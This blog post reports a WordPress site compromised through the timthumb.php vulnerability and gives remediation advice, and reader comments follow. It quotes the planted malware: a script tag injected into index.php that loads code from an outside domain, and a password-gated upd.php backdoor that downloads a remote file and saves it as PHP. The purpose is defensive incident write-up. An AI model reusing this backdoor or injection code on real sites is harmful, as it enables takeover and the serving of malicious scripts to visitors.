• X

    WordPress sites using Timthumb.php is Prone to Hacking [Almost Every Themes]

    By in WordPress

    Bluehost hosting

    Today one of my Client pinged me and told me that he is unable to login to his Wp-admin. His wp-admin was giving some error as mentioned below:

    “warning: Cannot modify header information – headers already sent by (output started at /home/stony/public_html/wp-settings.php:748) in /home/stony/public_html/wp-includes/pluggable.php on line 868

    When I logged into client site via FTP, I see some of the files were modified and some weird php files were added. The first weird code was found in index.php at the root of WordPress installation. Which has code

    superpuperdomainhack thumb WordPress sites using Timthumb.php is Prone to Hacking [Almost Every Themes]

    echo'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>

    Then in plugin folder there was a file call upd.php which has following codes

    $file = $_GET['file'];   <br />$pass = $_GET['pass'];    <br />$true = '1c383cd30b7c298ab50293adfecb7b18';    <br />if ($pass == $true){ </p>  <p>$ch = curl_init($file);   <br />curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);    <br />curl_setopt($ch, CURLOPT_HEADER, 0);    <br />curl_setopt($ch, CURLOPT_TIMEOUT, 5);    <br />$shell = curl_exec($ch);    <br />curl_close($ch); </p>  <p>$tmp = md5(rand(0,10000)); </p>  <p>$f = fopen($tmp.'.php',&quot;w&quot;);   <br />fputs($f,$shell);    <br />fclose($f);</p>  <p>

    Well that’s not all, there are many such other files which were infected. The reason for this hacking is Remote injection due to one vulnerability in timthumb.php.

    What is Timthumb.php?

    Timthumb.php is one of the most popular script to auto-generate thumbnail and it’s being used by almost all the popular premium WordPress theme club, many sites are getting infected due to this hack. The vulnerability in timthumb.php script allows hacker to upload an arbitrary php code in the cache directory of timthumb script and execute it. Once hacker execute this php file, he gets almost all the control of your site and he can do anything. In most of the cases you will see, your site is getting redirected or some ads and popup will appear on your site. In my client case, it’s wp-admin is inaccessible.

    So what’s the solution to this timthumb.php Hack?

    Very first thing which you should do is scan your Blog or you can ask your hosting company to run a scan. Delete all unused themes and plugins. Update all plugins and themes to latest version. If you using a free and outdated theme, you should switch to any premium WordPress theme or any free theme which keep getting constant updates. My recommendation grab Thesis theme which is well supported by the community and constantly updated. You can manually reinstall WordPress, update your theme and most imp. update the timthumb.php file. Author of this script has already updated the new file, which you can grab from here. Once done, recheck all files and check if there is any trace of hacked code. You can use some security WordPress plugin to see if any traces of hacked file is left or not.

    Even if you are not hacked or using an old version of Theme, I would suggest you to update your theme to latest version or atleast update your timthumb.php. Always remember, prevention is better than cure.

    In case if you are not technically sound and not familiar with FTP and fixing this issue, you can get in touch via our WordPress services page to let our team fix your site.

    Get Free Blogging updates in your Email

    Find more Topics based on Keywords

    Article by

    Harsh has written 1264 articles.

    If you like This post, you can follow ShoutMeLoud on Twitter. Subscribe to ShoutMeLoud feed via RSS or EMAIL to receive instant updates.

    { 20 comments… read them below or add one }

    Vivek Parmar

    That’s sad to hear that one of your client becomes the victim. That’s the reason why i use premium themes like Thesis and other popular framework :)

    Reply

    Harsh Agrawal

    @Vivek My client is just an example, it could be anyone who is using outdated timthumb.php script or using any outdated WordPress theme. Even many premium theme club has updated their theme with updated timthumb.php script. So quick suggestion is update your timthumb script else if your theme club has rolled out an update, update your theme.

    Reply

    bhushan

    omg.. but while i update my theme it seems all plugins damaged and all widgets are useless.. any solution of other way to update without any problem?

    Reply

    Harsh Agrawal

    @Bhusan
    What theme are you using? If you update the theme, I believe you won’t miss out the widgets. Or if you wanna be fail safe, simply drag and drop your widgets to inactive widgets tab, install new theme and put the widgets back.

    Reply

    bhushan

    thanks harsh for reply i am using mystique theme… but whenever i update my theme i lost my plugins :(

    Reply

    Manendra

    Harsh I am using Thesis theme can I update this timthumb.php code which you provided..?? in this root directory “thesis_18/lib/scripts/thumb.php

    Reply

    rakesh kumar

    Thanks a lot for this update. I have my own developed wordpress theme on my website and i have overall control on that theme so, at-last , my hard work is now paying for me. At-least i have not to worry about this security hole.

    Reply

    Fahad

    Thanks a lot Harsh, well my theme was also using timthumb.php file and was outdated, your post helped in securing my blog, hurrah updated to the latest version.

    Reply

    Prem Pandit

    Thanks for update. Do not give the chance to hacker to destroy your blog

    Reply

    Harsh Agrawal

    @Manendra It should be by name timthumb.php and yes the location is right and you can upgrade it directly by downloading the latest version from here
    http://timthumb.googlecode.com/svn/trunk/timthumb.php

    Reply

    Harsh Agrawal

    @Rakesh That’s nice that you using your own theme and I hope you not using any plugin to generate thumbnail or anything like that. If yes, update those plugins..

    @Prem @Fahad
    Glad I could help..Thanks for your comment.. :)

    Reply

    Manendra

    Thank Q Harsh and will up date this now. And thank Q for informing about this issue.

    Reply

    Amy

    As far as I know, Timthumb code in Thesis (lib/scripts) is not the same with the one available at googlecode (Timthumb old version). So is it okay to just copy like that?

    Of course the new version of Timthumb (googlecode) has new securities added.

    Is your client using Thesis or did he used Timthumb from googlecode (old version)?

    Reply

    Shariq

    Thanks to Woo Themes. They mailed all their customers and notified about security risk. They instantly updated their framework including timthumb . Users can easily update framework via their theme option panel.

    Reply

    Saugat Adhikari

    I have the same issue. I just log in into wordpress directory with wp-login.php and reinstall the update from admin page. It works for me. :)

    Reply

    Siddharth

    Not sure about it, but people using Brute force attack often to hack into WP.. few of my friends suffered as well.. Restricting “WP-admin” folder to particular IP might solve such Admin problems i guess.

    Reply

    Vijay

    Hi Harsh,
    Thanks for the info. The file version above 1.09 and below 1.35 is vulnerable to security attacks. I have updated r=necessary files to latest version.

    One question:
    There is one file named “timthumb.php.svn-base” having only 4 lines in it. Is it something insecure to keep as is or needs to be updated? and What info it has?

    Thanks
    Vijay

    Reply

    Suhanesh Madav

    Thanks Harsh for info.Will check whether my theme got an updated code or not ?

    Reply

    Sahil Kotak

    Yeah, I found such vulnerable files in wordpress many times. They are mostly some numbers.php (4347623.php or something like that).

    Reply

    Peter

    I also have had a number of clients get hit with this hack. Not everybody is comfortable with the process of finding/upgrading the timthumb script in their themes or plugins (some plugins use this script too!). I put together this plugin yesterday to help:
    http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

    Reply

    Leave a Comment

    Previous post:

    Next post:

    `